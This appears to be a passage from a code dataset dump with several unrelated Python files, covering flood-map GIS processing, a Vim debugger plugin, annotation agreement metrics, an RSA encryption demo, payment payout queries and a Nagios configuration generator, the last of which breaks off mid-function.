id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
1659355 | <filename>python/ef5_inundation.py
#
# Processes Flood Inundation Maps from EF5 http://flash.ou.edu/pakistan/
#
import os, sys
from datetime import date
from dateutil.parser import parse
import glob, fnmatch, urllib, math, shutil
from osgeo import gdal
import numpy
import argparse
import config
import json
from browseimage import MakeBrowseImage
from s3 import CopyToS3
from level import CreateLevel
force = 0
verbose = 0
BASE_DIR = config.EF5_DIR
def execute( cmd ):
if verbose:
print cmd
os.system(cmd)
def process(mydir, scene, s3_bucket, s3_folder):
fullName = os.path.join(mydir, scene+".tif")
if not os.path.exists(fullName):
print "File does not exist", fullName
sys.exit(-1)
# Flood inundation map for Namibia has to large of an extent [[10,-30,30,-10]]
# we can trim it [15, -20, 20, -10]
subsetFileName = os.path.join(mydir, "%s_subset.tif" % scene)
if force or not os.path.exists(subsetFileName):
bbox = [15, -20, 20, -12]
warpOptions = "-q -overwrite -co COMPRESS=DEFLATE -t_srs EPSG:4326 -te %s %s %s %s " % (bbox[0], bbox[1], bbox[2], bbox[3])
warpCmd = 'gdalwarp ' + warpOptions + fullName + ' ' + subsetFileName
execute( warpCmd )
#sys.exit(-1)
geojsonDir = os.path.join(mydir,"geojson")
if not os.path.exists(geojsonDir):
os.makedirs(geojsonDir)
levelsDir = os.path.join(mydir,"levels")
if not os.path.exists(levelsDir):
os.makedirs(levelsDir)
merge_filename = os.path.join(geojsonDir, "ef5.%s.geojson" % scene)
topojson_filename = os.path.join(geojsonDir, "..", "ef5.%s.topojson" % scene)
browse_filename = os.path.join(geojsonDir, "..", "ef5.%s_browse.tif" % scene)
small_filename = os.path.join(geojsonDir, "..", "ef5.%s_small_browse.tif" % scene)
osm_bg_image = os.path.join(geojsonDir, "..", "osm_bg.png")
sw_osm_image = os.path.join(geojsonDir, "..", "ef5.%s_thn.jpg" % scene)
ds = gdal.Open( subsetFileName )
band = ds.GetRasterBand(1)
data = band.ReadAsArray(0, 0, ds.RasterXSize, ds.RasterYSize )
levels = [ 21, 13, 8, 5, 3, 2, 1]
hexColors = [ "#fee5d9", "#fcbba1", "#fc9272", "#fb6a4a", "#ef3b2c", "#cb181d", "#99000d"]
if force or not os.path.exists(topojson_filename+".gz"):
if verbose:
print "Processing", subsetFileName
for l in levels:
fileName = os.path.join(levelsDir, scene+"_level_%d.tif"%l)
CreateLevel(l, geojsonDir, fileName, ds, data, "height", force, verbose)
jsonDict = dict(type='FeatureCollection', features=[])
for l in reversed(levels):
fileName = os.path.join(geojsonDir, "height_level_%d.geojson"%l)
if os.path.exists(fileName):
print "merge", fileName
with open(fileName) as data_file:
data = json.load(data_file)
if 'features' in data:
for f in data['features']:
jsonDict['features'].append(f)
with open(merge_filename, 'w') as outfile:
json.dump(jsonDict, outfile)
# Convert to topojson
cmd = "topojson -p -o "+ topojson_filename + " " + merge_filename
execute(cmd)
cmd = "gzip --keep "+ topojson_filename
execute(cmd)
if force or not os.path.exists(sw_osm_image):
MakeBrowseImage(ds, browse_filename, subsetFileName, osm_bg_image, sw_osm_image, levels, hexColors, force, verbose, 6)
# we could remove geojsonDir and levelsDir
#cmd = "rm -rf %s %s" %(geojsonDir, levelsDir)
ds = None
file_list = [ sw_osm_image, topojson_filename, topojson_filename+".gz", fullName ]
CopyToS3( s3_bucket, s3_folder, file_list, force, verbose )
# ===============================
# Main
#
# python ef5_inundation.py --date 2015-02-03 -v -f
if __name__ == '__main__':
aws_access_key = os.environ.get('AWS_ACCESSKEYID')
aws_secret_access_key = os.environ.get('AWS_SECRETACCESSKEY')
parser = argparse.ArgumentParser(description='Generate EF5 flood map')
apg_input = parser.add_argument_group('Input')
apg_input.add_argument("-f", "--force", action='store_true', help="HydroSHEDS forces new water image to be generated")
apg_input.add_argument("-v", "--verbose", action='store_true', help="Verbose on/off")
apg_input.add_argument("-d", "--date", help="Date 2015-03-20 or today if not defined")
todaystr = date.today().strftime("%Y-%m-%d")
options = parser.parse_args()
dt = options.date or todaystr
force = options.force
verbose = options.verbose
today = parse(dt)
year = today.year
month = today.month
day = today.day
doy = today.strftime('%j')
ef5_dir = os.path.join(BASE_DIR,str(year),doy)
old_fileName = "%d%02d%02d.120000" % (year,month,day)
old_fullName = os.path.join(ef5_dir, old_fileName)
fileName = "%d%02d%02d" % (year,month,day)
fullName = os.path.join(ef5_dir, fileName)
shutil.copy2(old_fullName+".tif", fullName+".tif")
s3_folder = os.path.join("ef5", str(year), doy)
s3_bucket = 'ojo-d4' # Namibia
process(ef5_dir, fileName, s3_bucket, s3_folder)
| StarcoderdataPython |
3283925 | <filename>hypernode_monitoring/hn_config.py
"""
Bismuth
Configuration variables for HN monitoring script
"""
IP="127.0.0.1"
PORT="6969"
HN_PATH="/root/hypernode/modules"
HN_ADDRESS="your_hypernode_address_here_starts_with_a_B"
TIMEOUT_1=20
TIMEOUT_2=30
OUTFILE_1="/path/status.json"
OUTFILE_2="/path/hypernodes.json"
OUTFILE_3="/path/status_ex.json"
| StarcoderdataPython |
20121 | <filename>models/dl-weights.py
"""
This script downloads the weight file
"""
import requests
URL = "https://pjreddie.com/media/files/yolov3.weights"
r = requests.get(URL, allow_redirects=True)
open('yolov3_t.weights', 'wb').write(r.content)
| StarcoderdataPython |
3241370 | import numpy as np
import cv2
from mscoco import table
def get_classes(index):
obj = [v for k, v in table.mscoco2017.items()]
sorted(obj, key=lambda x:x[0])
classes = [j for i, j in obj]
np.random.seed(420)
colors = np.random.randint(0, 224, size=(len(classes), 3))
return classes[index], tuple(colors[index].tolist())
| StarcoderdataPython |
71582 | <reponame>mbarbon/vdebug<gh_stars>1-10
import vdebug.opts
import vdebug.log
import vim
import re
import os
import urllib
import time
class Keymapper:
"""Map and unmap key commands for the Vim user interface.
"""
exclude = ["run","set_breakpoint","eval_visual"]
def __init__(self):
self._reload_keys()
self.is_mapped = False
self.existing = []
def run_key(self):
return self.keymaps['run']
def close_key(self):
return self.keymaps['close']
def map(self):
if self.is_mapped:
return
self._store_old_map()
self._reload_keys()
for func in self.keymaps:
if func not in self.exclude:
key = self.keymaps[func]
map_cmd = "noremap %s%s :python debugger.%s()<cr>" %\
(self.leader,key,func)
vim.command(map_cmd)
self.is_mapped = True
def _reload_keys(self):
self.keymaps = vim.eval("g:vdebug_keymap")
self.leader = vim.eval("g:vdebug_leader_key")
def _store_old_map(self):
vim.command('let tempfile=tempname()')
tempfile = vim.eval("tempfile")
vim.command('mkexrc! %s' % (tempfile))
regex = re.compile(r'^([nvxsoilc]|)(nore)?map!?')
split_regex = re.compile(r'\s+')
keys = set(v for (k,v) in self.keymaps.items() if k not in self.exclude)
special = set(["<buffer>", "<silent>", "<special>", "<script>", "<expr>", "<unique>"])
for line in open(tempfile, 'r'):
if not regex.match(line):
continue
parts = split_regex.split(line)[1:]
for p in parts:
if p in special:
continue
elif p in keys:
vdebug.log.Log("Storing existing key mapping, '%s' " % line,
vdebug.log.Logger.DEBUG)
self.existing.append(line)
else:
break
os.remove(tempfile)
def unmap(self):
if self.is_mapped:
self.is_mapped = False
for func in self.keymaps:
key = self.keymaps[func]
if func not in self.exclude:
vim.command("unmap %s%s" %(self.leader,key))
for mapping in self.existing:
vdebug.log.Log("Remapping key with '%s' " % mapping,\
vdebug.log.Logger.DEBUG)
vim.command(mapping)
class FilePath:
is_win = False
"""Normalizes a file name and allows for remote and local path mapping.
"""
def __init__(self,filename):
if filename is None or \
len(filename) == 0:
raise FilePathError("Missing or invalid file name")
filename = urllib.unquote(filename)
if filename.startswith('file:'):
filename = filename[5:]
if filename.startswith('///'):
filename = filename[2:]
p = re.compile('^/?[a-zA-Z]:')
if p.match(filename):
self.is_win = True
if filename[0] == "/":
filename = filename[1:]
self.local = self._create_local(filename)
self.remote = self._create_remote(filename)
def _create_local(self,f):
"""Create the file name as a locally valid version.
Uses the "local_path" and "remote_path" options.
"""
ret = f
if ret[2] == "/":
ret = ret.replace("/","\\")
if vdebug.opts.Options.isset('path_maps'):
for remote, local in vdebug.opts.Options.get('path_maps', dict).items():
if remote in ret:
vdebug.log.Log("Replacing remote path (%s) " % remote +\
"with local path (%s)" % local ,\
vdebug.log.Logger.DEBUG)
ret = ret.replace(remote,local)
break
return ret
def _create_remote(self,f):
"""Create the file name valid for the remote server.
Uses the "local_path" and "remote_path" options.
"""
ret = f
if vdebug.opts.Options.isset('path_maps'):
for remote, local in vdebug.opts.Options.get('path_maps', dict).items():
if local in ret:
vdebug.log.Log("Replacing local path (%s) " % local +\
"with remote path (%s)" % remote ,\
vdebug.log.Logger.DEBUG)
ret = ret.replace(local,remote)
break
if ret[2] == "\\":
ret = ret.replace("\\","/")
if self.is_win:
return "file:///"+ret
else:
return "file://"+ret
def as_local(self,quote = False):
if quote:
return urllib.quote(self.local)
else:
return self.local
def as_remote(self):
return self.remote
def __eq__(self,other):
if isinstance(other,FilePath):
if other.as_local() == self.as_local():
return True
return False
def __ne__(self,other):
if isinstance(other,FilePath):
if other.as_local() == self.as_local():
return False
return True
def __add__(self,other):
return self.as_local() + other
def __radd__(self,other):
return other + self.as_local()
def __str__(self):
return self.as_local()
def __repr__(self):
return str(self)
class LocalFilePath(FilePath):
def _create_local(self,f):
"""Create the file name as a locally valid version.
Uses the "local_path" and "remote_path" options.
"""
return f
class RemoteFilePath(FilePath):
def _create_remote(self,f):
"""Create the file name valid for the remote server.
Uses the "local_path" and "remote_path" options.
"""
return f
class FilePathError(Exception):
pass
class InputStream:
"""Get a character from Vim's input stream.
Used to check for keyboard interrupts."""
def probe(self):
try:
vim.eval("getchar(0)")
time.sleep(0.1)
except: # vim.error
raise UserInterrupt()
class UserInterrupt(Exception):
"""Raised when a user interrupts connection wait."""
| StarcoderdataPython |
1745363 | from argparse import ArgumentParser
from typing import List, Dict
import pandas as pd
import numpy as np
import os
from glob import glob
from itertools import combinations, product
from common import Role, Argument
from evaluate import Metrics, joint_len, iou
from evaluate_dataset import eval_datasets, yield_paired_predicates
from decode_encode_answers import decode_qasrl
def is_argument_match(arguments1: List[Argument], arguments2: List[Argument]):
for arg1, arg2 in product(arguments1, arguments2):
if iou(arg1, arg2) >= 0.3:
return True
return False
def evaluate_agreement(roles1: List[Role], roles2: List[Role]) -> int:
used_roles1 = set()
used_roles2 = set()
n_matches = 0
for role1, role2 in product(roles1, roles2):
# if role1 in used_roles1 or role2 in used_roles2:
# continue
q1 = role1.question.wh.lower()
q2 = role2.question.wh.lower()
q1 = 'whowhat' if q1 in ('who', 'what') else q1
q2 = 'whowhat' if q2 in ('who', 'what') else q2
is_wh_match = q1 == q2
if is_argument_match(role1.arguments, role2.arguments):
if not is_wh_match:
print(role1.question.text, role2.question.text)
if is_wh_match and is_argument_match(role1.arguments, role2.arguments):
n_matches += 1
used_roles1.add(role1)
used_roles2.add(role2)
return n_matches
def eval_datasets_for_agreement(df1, df2):
n_matches = 0
n_total_roles = 0
for key, roles1, roles2 in yield_paired_predicates(df1, df2):
local_n_matches = evaluate_agreement(roles1, roles2)
n_matches += local_n_matches
n_total_roles += len(roles1) + len(roles2) - local_n_matches
return n_matches, n_total_roles
def evaluate_generator_agreement(annot_df: pd.DataFrame, sent_map: Dict[str, List[str]]):
cols = ['qasrl_id', 'verb_idx']
n_gen = annot_df.groupby(cols).worker_id.transform(pd.Series.nunique)
workers = annot_df.worker_id.unique().tolist()
n_workers = len(workers)
annot_df = annot_df[n_gen == n_workers].copy()
n_predicates = annot_df[cols].drop_duplicates().shape[0]
print("n_workers: ", n_workers)
print("n_predicates: ", n_predicates)
print(f"worker_1\tworker_2\tprec\trecall\tf1")
f1s, label_f1s = [], []
uniq_roles_per_predicate = []
agreed_roles_per_predicate = []
for w1, w2 in combinations(workers, r=2):
w1_df = annot_df[annot_df.worker_id == w1].copy()
w2_df = annot_df[annot_df.worker_id == w2].copy()
# n_matches, n_total = eval_datasets_for_agreement(w1_df, w2_df)
# uniq_roles_per_predicate.append(float(n_total)/n_predicates)
# agreed_roles_per_predicate.append(float(n_matches)/n_predicates)
#
#
arg_metrics, label_arg_metrics, _ = eval_datasets(w1_df, w2_df)
print(f"{w1}\t{w2}\t{arg_metrics.prec()}\t{arg_metrics.recall()}\t{arg_metrics.f1()}")
print(f"{w1}\t{w2}\t{label_arg_metrics.prec()}\t{label_arg_metrics.recall()}\t{label_arg_metrics.f1()}")
f1s.append(arg_metrics.f1())
label_f1s.append(label_arg_metrics.f1())
f1s = np.array(f1s)
label_f1s = np.array(label_f1s)
print(f1s.mean(), f1s.std())
print(label_f1s.mean(), label_f1s.std())
# agreed_roles_per_predicate = np.array(agreed_roles_per_predicate)
# print(agreed_roles_per_predicate.mean(), agreed_roles_per_predicate.std())
#
# uniq_roles_per_predicate = np.array(uniq_roles_per_predicate)
# print(uniq_roles_per_predicate.mean(), uniq_roles_per_predicate.std())
def read_csv(file_path: str):
try:
return pd.read_csv(file_path)
except UnicodeDecodeError:
return pd.read_csv(file_path, encoding="Latin-1")
def dataset_path(root_dir: str, dataset_name: str,
gen1: str, gen2: str, arb: str):
slice_path = "_".join([gen1, gen2, arb])
slice_path = f"{dataset_name}.inter.{slice_path}.csv"
slice_path = os.path.join(root_dir, slice_path)
return slice_path
def main(root_dir: str, dataset_name: str):
readme = pd.read_csv(os.path.join(root_dir, 'readme.csv'))
sent_path = os.path.join(root_dir, f'{dataset_name}.csv')
sent_df = read_csv(sent_path)
sent_map = dict(zip(sent_df.qasrl_id, sent_df.tokens.apply(str.split)))
# original annotations, multiple generation tasks per predicate
annot_df = read_csv(os.path.join(root_dir, f'{dataset_name}.annot.csv'))
annot_df = decode_qasrl(annot_df)
print(annot_df.worker_id.value_counts())
evaluate_generator_agreement(annot_df, sent_map)
slice_pairs = []
for arbitrators_, generators_ in zip(readme.arbitrators, readme.generators):
arb1, arb2 = arbitrators_.split()
gen1, gen2, gen3, gen4 = generators_.split()
slice1_path = dataset_path(root_dir, dataset_name, gen1, gen2, arb1)
slice2_path = dataset_path(root_dir, dataset_name, gen3, gen4, arb2)
slice1 = decode_qasrl(pd.read_csv(slice1_path))
slice2 = decode_qasrl(pd.read_csv(slice2_path))
# make sure they have the same predicates...
s1 = set(zip(slice1.qasrl_id, slice1.verb_idx))
s2 = set(zip(slice2.qasrl_id, slice2.verb_idx))
print(len(s1), len(s2))
unlabelled_arg, labeled_arg, unlabelled_role = eval_datasets(slice1, slice2)
print(unlabelled_arg)
print(labeled_arg)
print(unlabelled_role)
if __name__ == "__main__":
ap = ArgumentParser()
ap.add_argument("inter_annotator_dir")
ap.add_argument("dataset_name")
args = ap.parse_args()
main(args.inter_annotator_dir, args.dataset_name)
| StarcoderdataPython |
3317585 | <reponame>Alex014/CryptoContainer
from classes.CryptorRSA import CryptorRSA
import base64
import rsa
cryptor = CryptorRSA(rsa_bits=512, blowfish_bits=256)
(pubkey, privkey) = cryptor.generate()
print("\n *** Public key: \n" + pubkey.decode('utf-8'))
print("\n *** Private key: \n" + privkey.decode('utf-8'))
msg = "Pure Python RSA implementationPyPI Build Status Coverage Status Code Climate\n" \
"Python-RSA is a pure-Python RSA implementation. It supports encryption and decryption, signing and verifying signatures, and key generation according to PKCS#1 version 1.5. It can be used as a Python library as well as on the commandline. The code was mostly written by <NAME>.\n" \
"Documentation can be found at the Python-RSA homepage. For all changes, check the changelog."
print("\n *** Original message: \n" + msg)
encryption = cryptor.encrypt(msg, pubkey)
ciphertext = encryption[0]
bkey = encryption[1]
ciphertext = base64.b64encode(ciphertext)
bkey = base64.b64encode(bkey)
ciphertext = base64.b64decode(ciphertext)
bkey = base64.b64decode(bkey)
msg = cryptor.decrypt(ciphertext, bkey, privkey)
print("\n *** Decrypted message: \n" + msg)
# *******************************************
sig = cryptor.sign(msg, privkey)
sig = base64.b64encode(sig)
print("\n *** Message signature: " + sig.decode('utf-8'))
sig = base64.b64decode(sig)
verify = cryptor.verify(msg, pubkey, sig)
print("\n *** Verification result: ")
print(verify) | StarcoderdataPython |
1622837 | name = ''
while True:
print('Please type your name.')
name = input()
# if name equals to 'your name', then jump out of loop
if name == 'your name':
break
print('Thank you!')
| StarcoderdataPython |
1702327 | from utils import *
from pprint import pprint as pp
import requests, json, sys, decimal
from datetime import datetime, timedelta
#organizations/self/accounts/LIQUID/transactions\?start=2020-08-01T00:00:00\&end=2020-08-14T00:00:00\&includeTransactionType=PAYOUT
if len(sys.argv) != 2:
sys.stderr.write('Usage: %s <days>\n')
sys.exit(1)
access_token = get_access_token()
offset = int(sys.argv[1])
start_date = (datetime.now() - timedelta(days = offset)).strftime('%Y-%m-%dT%H:%M:%S')
end_date = datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
method = 'get'
server = 'finance'
path = 'organizations/self/accounts/LIQUID/transactions'
url = 'https://%s.izettle.com/%s' % (server, path)
res = getattr(requests, method)(url,
headers = {'Authorization': 'Bearer %s' % access_token},
params = {'start': start_date,
'end': end_date,
'includeTransactionType': 'PAYOUT'})
data = json.loads(res.text)
full_amount = decimal.Decimal(0)
for payout in data['data']:
amount = decimal.Decimal(payout['amount']) * -1 / 100
full_amount += amount
print(payout['timestamp'], amount)
print("SUM:", full_amount)
| StarcoderdataPython |
4817207 | from __future__ import print_function
import logging
import backoff
from throttle import throttle
from config import __packagename__
class Resiliently(object):
def __init__(self, config):
self._config = config
if config.verbose:
logging.getLogger('backoff').addHandler(logging.StreamHandler())
def call(self, func, *args, **kwargs):
return self._throttle(self._retry, func, *args, **kwargs)
def _throttle(self, func, *args, **kwargs):
return throttle(delay_sec=self._config.throttling)(func)(*args, **kwargs)
def _retry(self, func, *args, **kwargs):
# We +1 this because backoff retries UP to and not including max_retries
max_tries = self._config.retry + 1
return backoff.on_exception(backoff.expo, Exception, max_tries=max_tries)(func)(*args, **kwargs)
| StarcoderdataPython |
1775431 | #!/usr/bin/python2.7
"""
Copyright (c) 2014, ICFLIX Media FZ LLC All rights reserved.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
Desc: Generate Nagios configuration from given file, resp. from check_multi.
"""
import logging
import logging.handlers
import json
import os.path
import re
import sys
import yaml
from nagios_to_yaml import NagiosToYaml
ICINGA_DIR = '/etc/icinga'
LOG_FORMAT = '%(asctime)s %(levelname)-10s %(message)s'
MACHINEDB_FILE = '/etc/icinga/machines.json'
NAGIOS_DEFS_FILE = '/etc/icinga/nagios.yml'
NAGIOS_TKEYS = [
'commands',
'contacts',
'contactgroups',
'datacenters',
'hostgroups',
'hosts',
'services'
]
STAGING_DOMAIN = 'icflix.io'
# 7 minutes
SVC_FRESHNESS_THRESHOLD = 420
# Make sure Nagios knows all Hosts in MachineDB
# -> <FQDN>.cfg must exist for each and every Host in MDB
# Re-Generate hostgroups
# Re-Generate contacts
# Re-Generate contactsgroups
# Re-Generate commands
class NagiosConfigGenerator(object):
"""Generate Nagios Configuration for *ONE* Host from given file."""
def __init__(self):
self.machine_db = None
self.nagios_db = None
self.load_machine_db()
self.load_nagios_definitions()
self.mdb_to_nagios()
def add_datacenter_to_nagios(self, dct_dict):
"""Add given Datacenter to Nagios. If given Datacenter is already
known, merge in attributes/values, but don't over-ride Nagios ones.
"""
nagios_dcs = self.nagios_db['datacenters']
dct_name = dct_dict.pop('host_name')
if dct_name not in nagios_dcs:
nagios_dcs[dct_name] = {}
nagios_dct = nagios_dcs[dct_name]
if 'hostgroups' not in nagios_dct:
nagios_dct['hostgroups'] = list()
nagios_dct['hostgroups'].append('datacenter')
if 'host' not in nagios_dct:
nagios_dct['host'] = {}
for attr in dct_dict.iterkeys():
if attr in nagios_dct['host']:
# Don't over-ride Nagios definitions
continue
nagios_dct['host'][attr] = dct_dict[attr]
def add_host_to_nagios(self, host_dict, is_lxc):
"""Add given Host to Nagios. If given Host is already known, merge in
values, but don't over-ride Nagios ones.
"""
nagios_hosts = self.nagios_db['hosts']
hostname = host_dict.pop('host_name')
if hostname not in nagios_hosts:
nagios_hosts[hostname] = {}
nagios_host = nagios_hosts[hostname]
if 'hostgroups' not in nagios_host:
nagios_host['hostgroups'] = list()
auto_hostgroup = self.get_auto_hostgroup(hostname)
nagios_host['hostgroups'].append(auto_hostgroup)
if is_lxc:
nagios_host['hostgroups'].append('lxc')
if ('_DOMAIN' in host_dict
and host_dict['_DOMAIN'] == STAGING_DOMAIN):
nagios_host['hostgroups'].append('stage')
if 'host' not in nagios_host:
nagios_host['host'] = {}
for attr in host_dict.iterkeys():
if attr in nagios_host['host']:
# Don't over-ride Nagios definitions
continue
nagios_host['host'][attr] = host_dict[attr]
def add_services_to_host(self, nagios_host, ext_svcs):
"""Add (external) service definition to Nagios."""
if 'services' not in nagios_host:
nagios_host['services'] = {}
nagios_svcs = nagios_host['services']
for svc_key in ext_svcs['services'].iterkeys():
if svc_key not in nagios_svcs:
nagios_svcs[svc_key] = {}
nagios_svc = nagios_svcs[svc_key]
for attr in ext_svcs['services'][svc_key].iterkeys():
if attr in nagios_svc:
continue
nagios_svc[attr] = ext_svcs['services'][svc_key][attr]
def ensure_host_definitions(self):
"""Ensure Nagios knows all Hosts defined in MDB. This is required in
order to re-generate Hostgroups, because it could easilly happen Nagios
wouldn't know Host(s) in hostgroups.
"""
for host_key in self.nagios_db['hosts'].iterkeys():
host_dict = self.nagios_db['hosts'][host_key]
host_dict['host']['host_name'] = host_key
self.ensure_host_definition(host_dict)
def ensure_host_definition(self, host_dict):
"""Ensure file with Host definition exists."""
if host_dict is None:
return (-1)
host_file = ('%s/objects/host_%s.cfg' %
(ICINGA_DIR, host_dict['host']['host_name']))
if os.path.exists(host_file):
#logging.debug("File '%s' exists.", host_file)
return 1
fhandle = open(host_file, 'w+')
self.write_definition(fhandle, 'host', host_dict['host'])
if 'services' not in host_dict:
host_dict['services'] = {}
dummy_svc = dict()
dummy_svc['active_checks_enabled'] = 1
dummy_svc['check_command'] = 'return-ok'
dummy_svc['check_interval'] = 20
dummy_svc['host_name'] = host_dict['host']['host_name']
dummy_svc['use'] = 'generic-service'
host_dict['services']['dummy-ok'] = dummy_svc
for service_key in host_dict['services'].iterkeys():
service_copy = host_dict['services'][service_key]
service_copy['service_description'] = service_key
self.write_definition(fhandle, 'service',
service_copy)
del service_copy
fhandle.close()
return 0
def finish_host_definition(self, host_dict, hostname):
"""Add/over-ride attributes in Host definition."""
if hostname not in self.nagios_db['hosts']:
return
if 'host' not in self.nagios_db['hosts'][hostname]:
return
for attr in self.nagios_db['hosts'][hostname]['host'].iterkeys():
host_dict[attr] = self.nagios_db['hosts'][hostname]['host'][attr]
def get_auto_hostgroup(self, hostname):
"""Determine automatic Nagios hostgroup."""
auto_hostgroup = hostname.split('.')[0]
auto_hostgroup = re.sub(r'(\d+$|\d+[a-z]+)$', r'', auto_hostgroup)
return auto_hostgroup
def get_host_dict(self, hostname, machine_ip, ssh_port, parents):
"""Create Nagios 'host' as a dictionary from given params.
Parents is expected to be either None or a list.
"""
host_dict = {}
host_dict['use'] = 'generic-host'
host_dict['host_name'] = hostname
host_dict['address'] = machine_ip
if parents is not None:
host_dict['parents'] = ','.join(parents)
if ssh_port is not None:
host_dict['_SSH_PORT'] = ssh_port
splitted = hostname.split('.')
host_dict['_SHORTNAME'] = '.'.join(splitted[:len(splitted)-2])
host_dict['_DOMAIN'] = '.'.join(splitted[len(splitted)-2:])
return host_dict
def get_padding(self, padding_len):
"""Return padding :)"""
padding = ''
while padding_len > 0:
padding += ' '
padding_len -= 1
return padding
def get_ssh_port(self, machine_obj, is_lxc):
"""Determine SSH port for given Machine."""
ssh_port = 22
if is_lxc == False:
return ssh_port
if 'ports' not in machine_obj:
# Ehm, this is a bit inconclusive, isn't it?
return ssh_port
for port_cfg in machine_obj['ports']:
# dict is expected here
if 'private_port' not in port_cfg:
continue
if int(port_cfg['private_port']) == 22:
ssh_port = int(port_cfg['public_port'])
return ssh_port
def load_machine_db(self):
"""Just loads machine DB from JSON."""
with open(MACHINEDB_FILE, 'r') as fhandle:
self.machine_db = json.load(fhandle)['machines']
def load_nagios_definitions(self):
"""Load Nagios definitions from YAML."""
with open(NAGIOS_DEFS_FILE, 'r') as fhandle:
self.nagios_db = yaml.load(fhandle)
# Make nagios_db sane
for top_key in NAGIOS_TKEYS:
if top_key in self.nagios_db:
continue
self.nagios_db[top_key] = {}
if 'passive' not in self.nagios_db['services']:
self.nagios_db['services']['passive'] = {}
if 'active' not in self.nagios_db['services']:
self.nagios_db['services']['active'] = {}
def import_config(self, services_cfg):
"""Import configuration file (sent) from remote Host."""
if not os.path.exists(services_cfg):
logging.error("Given file '%s' doesn't exist.", services_cfg)
return False
hostname = os.path.basename(services_cfg).replace('.cfg', '')
if hostname == '':
logging.error('I have empty hostname! :-(')
return False
nagios_host = None
for host_key in self.nagios_db['hosts'].iterkeys():
if hostname == host_key:
nagios_host = self.nagios_db['hosts'][host_key]
break
if nagios_host is None:
logging.error('Machine %s not found in Nagios/MDB.', hostname)
return False
logging.info('FQDN: %s', hostname)
logging.info('IP: %s', nagios_host['host']['address'])
logging.info('SSH: %s', nagios_host['host']['_SSH_PORT'])
logging.info('Hostgroups: %s', nagios_host['hostgroups'])
nag2yaml = NagiosToYaml()
nag2yaml.parse_nagios_config(services_cfg)
ext_services = nag2yaml.nagios_cfg
for extsvc_key in ext_services['services'].iterkeys():
ext_service = ext_services['services'][extsvc_key]
if 'stage' in nagios_host['hostgroups']:
ext_service['use'] = 'stage-service'
else:
ext_service['use'] = 'generic-service'
ext_service['check_freshness'] = 1
ext_service['active_checks_enabled'] = 0
ext_service['passive_checks_enabled'] = 1
ext_service['freshness_threshold'] = SVC_FRESHNESS_THRESHOLD
ext_service['check_command'] = 'check_dummy_4p!2 "check is stale"'
if extsvc_key not in self.nagios_db['services']['passive']:
continue
# Over-ride attributes from ['services']['passive']
svc_nagios = self.nagios_db['services']['passive'][extsvc_key]
for attr in svc_nagios.iterkeys():
ext_service[attr] = svc_nagios[attr]
self.add_services_to_host(nagios_host, ext_services)
host_file = '%s/objects/host_%s.cfg' % (ICINGA_DIR, hostname)
with open(host_file, 'w+') as fhandle:
host_copy = nagios_host['host'].copy()
host_copy['host_name'] = hostname
self.write_definition(fhandle, 'host', host_copy)
for svc_key in nagios_host['services'].iterkeys():
service_copy = nagios_host['services'][svc_key].copy()
service_copy['service_description'] = svc_key
self.write_definition(fhandle, 'service', service_copy)
return True
def mdb_to_nagios(self):
"""Sync Nagios YAML with MDB."""
for host_key in self.machine_db.iterkeys():
hostname = '%s.icflix.com' % (host_key)
mdb_host = self.machine_db[host_key]
if 'datacenter' in mdb_host and 'provider' in mdb_host:
dct_name = '%s.%s' % (mdb_host['datacenter'],
mdb_host['provider'])
dct_dict = self.get_host_dict(dct_name, 'localhost', None, None)
dct_dict['use'] = 'generic-datacenter'
dct_dict.pop('_SHORTNAME')
dct_dict.pop('_DOMAIN')
self.add_datacenter_to_nagios(dct_dict)
parents = [dct_name]
else:
parents = None
host_dict = self.get_host_dict(hostname, mdb_host['ip'], 22,
parents)
self.add_host_to_nagios(host_dict, False)
if 'lxc' not in mdb_host:
continue
for lxc_key in mdb_host['lxc'].iterkeys():
ssh_port = self.get_ssh_port(mdb_host['lxc'][lxc_key], True)
lxc_dict = self.get_host_dict(lxc_key, mdb_host['ip'],
ssh_port, [hostname])
self.add_host_to_nagios(lxc_dict, True)
def print_definition(self, definition_str, some_dict):
"""Print host definition."""
stuffing_len = 0
dict_keys = some_dict.keys()
dict_keys.sort()
# figure-out padding len
for attribute in dict_keys:
if len(attribute) > stuffing_len:
stuffing_len = len(attribute)
stuffing_len += 1
print 'define %s {' % (definition_str)
for attribute in dict_keys:
padding_len = stuffing_len - len(attribute)
padding = self.get_padding(padding_len)
print ' %s%s%s' % (attribute, padding, some_dict[attribute])
print '}\n'
def run(self, services_cfg):
""" Go, go, go!"""
if not self.import_config(services_cfg):
return False
self.ensure_host_definitions()
self.write_command_definitions()
self.write_contact_definitions()
self.write_contactgroup_definitions()
self.write_datacenter_definitions()
self.write_hostgroup_definitions()
self.write_service_definitions()
return True
def write_command_definitions(self):
"""Write definitions of all commands."""
if 'commands' not in self.nagios_db:
return
commands_file = '%s/objects/commands.cfg' % (ICINGA_DIR)
fhandle = open(commands_file, 'w+')
i = 0
for command in self.nagios_db['commands'].iterkeys():
cmd_dict = self.nagios_db['commands'][command]
cmd_dict['command_name'] = command
self.write_definition(fhandle, 'command', cmd_dict)
i += 1
fhandle.close()
logging.info("Written %i 'command' definitions.", i)
def write_contact_definitions(self):
"""Write definitions of all contacts."""
if 'contacts' not in self.nagios_db:
return
contacts_file = '%s/objects/contacts.cfg' % (ICINGA_DIR)
fhandle = open(contacts_file, 'w+')
i = 0
for contact in self.nagios_db['contacts'].iterkeys():
contact_dict = self.nagios_db['contacts'][contact]
contact_dict['contact_name'] = contact
self.write_definition(fhandle, 'contact', contact_dict)
i += 1
fhandle.close()
logging.info("Written %i 'contact' definitions.", i)
def write_contactgroup_definitions(self):
"""Write definitions of all contactgroups."""
cgroups_file = '%s/objects/contactgroups.cfg' % (ICINGA_DIR)
cgroups = self.nagios_db['contactgroups']
fhandle = open(cgroups_file, 'w+')
i = 0
for cgroup_key in cgroups.iterkeys():
cgroup_dict = cgroups[cgroup_key]
cgroup_dict['contactgroup_name'] = cgroup_key
self.write_definition(fhandle, 'contactgroup', cgroup_dict)
i += 1
fhandle.close()
logging.info("Written %i 'contactgroup' definitions.", i)
def write_datacenter_definitions(self):
"""Write definitions for all datacenters."""
dctrs_file = '%s/objects/datacenters.cfg' % (ICINGA_DIR)
dctrs = self.nagios_db['datacenters']
with open(dctrs_file, 'w+') as fhandle:
i = 0
for dctr_key in dctrs.iterkeys():
dct_dict = dctrs[dctr_key]['host'].copy()
dct_dict['host_name'] = dctr_key
